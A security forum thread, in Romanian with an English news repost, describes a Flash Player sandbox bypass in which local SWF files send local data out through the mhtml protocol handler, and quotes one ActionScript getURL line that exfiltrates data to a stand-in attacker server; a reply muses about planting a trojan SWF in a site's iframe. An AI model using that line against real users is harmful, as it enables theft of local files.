Jump to content
begood

Flash Player sandbox can be bypassed

By begood, in Stiri securitate

Recommended Posts

begood Newbie

begood

Posted
Posted

Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent.

Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, run within the local-with-file-system sandbox, are permitted to access local files. They are not able to access the network, so a malicious SWF applet should not be able to send local data to a remote server.

However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but that this is only possible within the local area network. He has identified another protocol handler which can be used to send data to remote servers – mhtml.

Mhtml is supported by default under Windows, so that, according to Rios, local data can be sent to a remote server using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);. Rios has not provided a specific demo SWF file to illustrate the problem.

It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set.

Flash Player sandbox can be bypassed - The H Security: News and Features

luke999 Newbie

luke999

Posted
Posted

aha....am inteles deci omu baga trojanu in swf si cand se ruleaza se activeaza...moama ce idee ingenioasa da-ti seama ...faci un site si pui un iframe cu un filmuletz ...normal nu e filmuletz si ii schimbi extensia nu?dar cred ca nu il ia ca pe un exe daca ii schimbi extensia ...plm oricum daca stai si o gandesti e tzava sigur peste ceva timp o sa se rezolve...bun post!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...